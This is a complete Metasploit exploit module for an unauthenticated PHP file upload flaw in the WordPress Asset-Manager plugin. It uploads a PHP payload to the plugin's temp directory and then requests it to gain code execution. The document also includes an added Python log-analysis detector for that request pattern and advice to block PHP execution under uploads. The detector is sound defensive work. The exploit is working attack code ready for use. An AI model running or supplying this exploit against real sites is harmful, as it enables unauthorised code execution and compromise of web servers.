This Metasploit module exploits a vulnerability found in the WordPress Asset-Manager plugin, version 2.0 and below. The plugin allows PHP file upload: a user can upload a file to a temp directory without authentication, which results in arbitrary code execution.

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',
      'Description'    => %q{
          This module exploits a vulnerability found in Asset-Manager <= 2.0 WordPress
        plugin. By abusing the upload.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82653' ],
          [ 'BID', '53809' ],
          [ 'EDB', '18993' ],
          [ 'URL', 'http://www.myhack58.com/' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'May 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  def exploit
    uri = target_uri.path
    uri << '/' if uri[-1,1] != '/'
    peer = "#{rhost}:#{rport}"
    payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(:unlink_self=>true)

    # Build the multipart/form-data body; the plugin reads the file from the "Filedata" field
    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{payload_name}")
    res = send_request_cgi({
      'method'  => 'POST',
      'uri'     => "#{uri}wp-content/plugins/asset-manager/upload.php",
      'ctype'   => "multipart/form-data; boundary=#{data.bound}",
      'data'    => post_data
    })

    # The uploader echoes the stored file name back on success
    if not res or res.code != 200 or res.body !~ /#{payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    print_status("#{peer} - Executing payload #{payload_name}")
    res = send_request_raw({
      'uri'     => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
      'method'  => 'GET'
    })

    if res and res.code != 200
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
    end
  end
end
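As an added defender-side example (not part of the original post or the Metasploit module), the following Python detector looks for the request sequence the module produces in web-server access logs: a POST to the plugin's upload.php followed by a GET of a .php file under wp-content/uploads/assets/temp/. The log lines are constructed in combined log format, and the severity labels are an assumption.

```python
import re

# Constructed sample lines in combined log format (not taken from the page).
SAMPLE_LOG = """\
10.0.0.5 - - [26/May/2012:10:01:02 +0000] "POST /wordpress/wp-content/plugins/asset-manager/upload.php HTTP/1.1" 200 57 "-" "Mozilla/5.0"
10.0.0.5 - - [26/May/2012:10:01:03 +0000] "GET /wordpress/wp-content/uploads/assets/temp/kqzmx.php HTTP/1.1" 200 12 "-" "Mozilla/5.0"
10.0.0.9 - - [26/May/2012:10:05:00 +0000] "GET /wordpress/wp-content/uploads/assets/temp/logo.png HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
10.0.0.7 - - [26/May/2012:10:06:00 +0000] "POST /wordpress/wp-content/plugins/asset-manager/upload.php HTTP/1.1" 403 0 "-" "curl/7.22"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Paths used by the vulnerable plugin, as seen in the module above.
UPLOAD_ENDPOINT = "/wp-content/plugins/asset-manager/upload.php"
TEMP_DIR = "/wp-content/uploads/assets/temp/"


def parse_line(line):
    """Parse one combined-format log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ev = m.groupdict()
    ev["status"] = int(ev["status"])
    ev["path"] = ev["path"].split("?", 1)[0]  # ignore any query string
    return ev


def detect(log_text):
    """Return a list of (severity, ip, reason) findings, in log order."""
    findings = []
    uploaders = set()  # client IPs whose POST to the uploader was accepted (HTTP 200)
    for line in log_text.splitlines():
        ev = parse_line(line)
        if not ev:
            continue
        ip, path, method, status = ev["ip"], ev["path"], ev["method"], ev["status"]
        if method == "POST" and path.endswith(UPLOAD_ENDPOINT):
            if status == 200:
                uploaders.add(ip)
                findings.append(("medium", ip, "unauthenticated upload endpoint accepted a POST"))
            continue
        # PHP under the plugin's temp upload directory should never be requested or served;
        # a request from an IP that just uploaded is the module's upload-then-execute pattern.
        if TEMP_DIR in path and path.lower().endswith(".php"):
            severity = "high" if ip in uploaders else "medium"
            findings.append((severity, ip, f"PHP requested from upload temp dir: {path} (status {status})"))
    return findings
```

Blocking execution of .php files under wp-content/uploads at the web server removes the second step regardless of whether the upload itself succeeds.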